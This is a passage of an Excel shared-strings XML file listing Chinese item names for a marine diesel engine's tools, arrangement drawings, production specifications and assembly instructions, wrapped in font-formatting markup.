        <charset val="134"/>
      </rPr>
      <t>工具</t>
    </r>
  </si>
  <si>
    <r>
      <t>S35P</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>注油器工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机械控制机构工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>启动空气系统工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>涡轮增压器系统工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>额外工具（选配）</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <t>MS-924</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>环氧锲工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵扳手</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>超速停车扳手</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>额外工具清单</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工具板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <t>901</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工具和工具板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <t>902</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工具和工具板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <t>903</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工具和工具板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <t>904</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工具和工具板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <t>905</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工具和工具板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <t>906</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工具和工具板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <t>907</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工具和工具板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <t>908</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工具和工具板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <t>909</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工具和工具板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <t>910</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工具和工具板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <t>912</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工具和工具板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>底柜检修孔</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油单元布置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泄放储油柜单元布置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸润滑油泵布置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泵单元密封油</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>结构支撑布置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泵进口管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泵出口管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>过滤器进口管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>热粘度计出口管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>仪表板布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>感光单元布置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>顶撑装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压减振器设备</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>生产规范</t>
    </r>
  </si>
  <si>
    <r>
      <t>KF137</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>智能柴油机</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>启动空气分配器生产规范</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铸件说明书</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>白合金滑块质量规范</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>白合金推力轴承质量规范</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>其它材料熔融</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座薄板焊接维修</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸盖热腐蚀维修</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>其他材料修补</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>固定设备焊接说明</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>球墨蓄压块质量控制</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架工艺</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸体工艺</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴工艺</t>
    </r>
  </si>
  <si>
    <r>
      <t>REG09</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机加工工艺</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀工艺</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>换向机构工艺</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <t>REG33</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机加工工艺</t>
    </r>
  </si>
  <si>
    <r>
      <t>L-MC</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工艺</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸体检查</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>作记号</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆青铜衬垫</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主要零件尺寸和重量</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座机架装配说明</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>基板总成装配</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>启动空气分配器生产建议</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链传动上部质量控制</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑阀式喷油器生产建议</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴接受标准</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>往复运动部件找中测量表</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>发电机轴质量规范</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>标准拉伸钢材试样</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座装配</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>对中</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力轴承改变</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>结构梁</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架对中</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调油轴装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操纵系统测试质量控制</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸体装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气集管安装</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操纵机构安装</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <t>4</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>次力矩补偿器安装</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>建议</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>高压燃油泵测试生产规范</t>
    </r>
  </si>
  <si>
    <r>
      <t>2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冲程柴油机安装</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滴水分离器座</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气流过校直装置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
